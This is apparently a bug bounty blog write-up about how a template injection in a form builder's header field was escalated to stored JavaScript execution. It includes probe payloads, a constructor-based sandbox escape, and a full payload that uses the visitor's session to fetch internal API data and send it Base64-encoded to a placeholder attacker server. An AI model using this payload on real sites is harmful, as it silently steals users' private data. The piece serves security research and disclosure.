SSTI Leads to $$$$: Turning a Medium Bug into High Impact Data Exfiltration

Hi, I'm Kartik — a bug bounty hunter who enjoys turning simple findings into real-world impact.

🔗 Blog/Portfolio: https://kartikhunter.github.io/ 🔗 GitHub: https://github.com/Kartikhunter

This is the story of how a simple SSTI turned into a high-impact data exfiltration vulnerability… and $$$$.

A Quick Note on SSTI

Before jumping into the story, let's quickly understand what Server-Side Template Injection (SSTI) is.

Modern web applications use template engines to render dynamic content. If user input is directly injected into these templates without proper sanitization, it can lead to SSTI.

A simple test usually looks like this:

{{7*7}}

If the output comes back as 49You're not just dealing with reflection — the server is actually evaluating your input.

Different template engines behave differently:

  • Jinja2 (Python){{7*7}}
  • Twig (PHP){{7*7}}
  • Freemarker (Java)${7*7}
  • Velocity (Java)#set($x=7*7) $x
  • Handlebars (Node.js){{this}}

For More Read: SSTI (Server Side Template Injection) — HackTricks

In the best case for an attacker, SSTI leads to Remote Code Execution (RCE). But sometimes… things don't go that smoothly.

🕵️ The "Hmm… Ye Kuch Toh Gadbadh Hai" Moment

While casually poking around the application, I stumbled upon a feature where users could create custom forms. Nothing fancy. Just another form builder… or so I thought. But then I noticed something — a header field that felt a little too dynamic. You know that feeling during testing when something just doesn't sit right? Yeah… this was one of those moments.

🧪 Curiosity > Everything

Out of pure curiosity (and a bit of habit), I dropped a harmless payload:

{{3*3}}

And the response? 👉 9

At that exact moment, things went from:

None
When {{3*3}} actually returns 9 😏

Because that wasn't a reflection. That was execution.

🚧 Reality Check: "Itna Easy Nahi Milega"

Now obviously, the next step was to go full offensive mode. Tried all the usual suspects:

  • RCE payloads
  • Object traversal
  • Anything remotely dangerous

💡 The "Thoda Side Se Try Karte Hai" Move

When direct paths don't work, you don't stop — you pivot.

Instead of forcing RCE, I thought:

"Let's see if I can execute anything at all…"

After trying multiple payload variations, I landed on this:

{{[].filter.constructor('alert(1)')()}}

And then… 💥 Alert popped.

😏 That One Smile Moment

That tiny alert box might not look like much. But if you've done bug bounty long enough, you know:

"Ye chota sa alert hi bada paisa bana deta hai."

🤔 "Bas Alert? Ya Kuch Aur Bhi…"

At this point, I had JavaScript execution. Cool… but also not that impressive on its own. - No RCE. - No direct server control.

None
"Thoda aur nikaalte hain isme se…" 🧠

So technically, this could easily be labeled as:

"Nice find… Medium severity."

But honestly, that didn't feel right. Because the real question was:

"Agar JS run ho raha hai… to main kya-kya kar sakta hu?"

🚀 Time to Get Serious

Now the goal was clear: 👉 Can I access sensitive data using this execution? 👉 Can I make the victim's browser do the work for me?

After some trial and error, I crafted this payload:

{{[].filter.constructor("
fetch('https://target.com/api/actblueentitywebhookrequests/', {
credentials: 'include'
})
.then(r => r.text())
.then(data => {
fetch('https://<attacker-server>/?leak=' + btoa(data));
})
")()}}

⚡ "Silent Data Heist" Mode Activated

What this payload does is actually pretty sneaky:

  • It calls internal API endpoints
  • Uses the victim's logged-in session automatically
  • Reads the response
  • Encodes it (Base64, just to keep things clean)
  • Sends it straight to my server
None

All of this…

👉 Without any user interaction 👉 Without any visible change 👉 Without raising suspicion

Just open the form… and data is gone.

🎯 And Then Things Got Real

Now came the interesting part.

Whenever someone (especially an admin or users👀) visited that form:

  • Their session got used
  • API requests were made silently
  • Sensitive data started flowing to my server

I tested this on endpoints like:

  • /api/profile
  • /api/customer/federacy-one/

And yep… it worked exactly as expected.

None

From "Meh" to "Okay This Is Serious"

Initially, the bug looked like: 👉 SSTI (no RCE) → Medium

But after demonstrating: - Real data access - Session-based exploitation - Silent exfiltration

👉 It was upgraded to High severity

💰 And Yes… This Is Where $$$$ Comes In

This is exactly why:

Impact > Bug Type

Some Vulnerability. Different Mindset. And suddenly…

👉 SSTI → $$$$

🧠 Final Thought

A lot of bugs don't look impressive at first.

But the real difference is:

Do you stop at what you found… or do you explore what it can become?